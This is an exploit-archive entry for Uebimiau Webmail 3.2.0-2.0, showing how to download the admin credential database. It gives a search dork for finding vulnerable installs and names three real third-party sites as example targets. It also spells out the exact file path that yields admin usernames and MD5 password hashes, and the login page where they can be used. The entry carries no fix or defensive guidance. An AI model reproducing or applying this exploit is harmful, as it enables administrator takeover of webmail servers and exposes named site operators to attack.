Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure

EDB-ID:

9493




Platform:

PHP

Date:

2009-08-24


##################################################
[+]Script Name : Uebimiau Webmail v3.2.0-2.0
[+]Bug Type : Arbitrary Admins Database Disclosure Vulnerability
[+]D0rk : "Uebimiau Webmail v3.2.0-2.0"
[+]Author : Septemb0x
[+]Greetz : BHDR & BARCOD3 & MUHADRAM  - Thanks : www.gonulerleri.org
[+]Note :  Tüm Müslüman Camiasına Hayırlı Ramazanlar Dilerim...
##################################################
[+]Examples :
 
1.  http://ifcacareer.com/mail/inc/database/system_admin/admin.ucf
2.  http://krunt.org/webmail/inc/database/system_admin/admin.ucf
3.  http://www.hostsalive.com/webmail/inc/database/system_admin/admin.ucf
##################################################
[+]EXPLOIT ; http://[Target]/[path]/inc/database/system_admin/admin.ucf
[+]GET ; username:password(md5)
[+]LOGIN ; http://[Target]/[path]/admin/login.php
##################################################

# milw0rm.com [2009-08-24]